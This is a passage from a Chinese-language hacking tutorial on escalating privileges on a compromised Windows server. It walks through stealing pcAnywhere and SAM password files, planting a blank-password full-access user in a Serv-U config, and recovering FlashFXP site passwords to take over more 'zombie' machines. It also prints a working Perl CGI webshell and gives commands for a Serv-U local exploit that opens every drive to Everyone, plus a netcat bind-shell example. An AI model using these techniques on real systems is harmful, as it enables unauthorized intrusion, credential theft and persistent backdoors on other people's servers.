三. 找密码文件

①
C:\Documents and Settings\All Users\ApplicationData\Symantec\pcAnywhere\
看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密码，登陆
②
C:\WINNT\system32\config\
进这里下它的SAM，用到破解sam密码的软件有LC4，SAMinside

如果可以访问对方的SYSTEM32的话，删除对方的SAM文件，等他重启以后就是ADMIN用户密码为空
突然又有了想法，可以用REPLACE命令替换的吗，可以把你的SAM文件提取出来，上传到他的任意目录下，然后替换。不过不知道如果对SYSTEM32没有权限访问的话，能不能实现替换

③
C:\Documents and Settings\All Users\「开始」菜单\程序\\
看这里能跳转不，我们从这里可以获取好多有用的信息
可以看见好多快捷方式，我们一般选择Serv-U的，然后本地查看属性，知道路径后，看能否跳转
进去后，如果有权限修改ServUDaemon.ini，加个用户上去，密码为空
[USER=WekweN|1]
Password=
HomeDir=c:\\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限

④
使用Flashfxp也能提升权限，但是成功率就看你自己的运气了
首先找到FlashFXP文件夹，打开(编辑)Sites. dat，这个文件这是什么东西密码和用户名，而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中，替换我本地的相应文件。然后会发现打开flashfxp在站点中打开站点管理器一样。又可以添加N多肉鸡啦～～嘻嘻～
唔？？不对啊，是来提升权限的啊，晕，接着来别半途而废。大家看看对方管理员的这站点管理器，有用户名和密码，密码是星号的。经过用xp星号密码查看器查看，然后和Sites.dat中加密了密码做比较发现并未加密而是查到的密码是明文显示，然后最终把这个网站管理员的密码从这堆东西中找出来。那么下一步就可以链接这些新的服务器啦～～
经过测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。

四. 利用有价值的目录

看能否跳转到如下目录
c:\php, 用phpspy
c:\prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "\r\n", 13);
open(STDERR, ">&STDOUT") || die "Cant redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行，可以试试 pl 扩展呢，把刚才的 cgi 文件改为 pl 文件，提交 http://anyhost//cmd.pl?dir
显示"拒绝访问"，表示可以执行了！马上提交：先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
http://anyhost//cmd.pl?c\perl\bin\su.exe
返回：
Serv-u >3.x Local Exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
现在是 IUSR 权限，提交：
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"
如果返回下面的信息，就表示成功了
Serv-u >3.x Local Exploit by xiaolu
USER LocalAdministrator
PASS #l@$ak#.lk;0@P
SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
USER xl
PASS 111111

但是后门和这两个文件必须要放到一块，有点问题，可以结合启动VBS，运行结束后，删除上传的后门.就是CODEBASE="shell.vbs".shell写法如上

上一页  [1] [2] [3]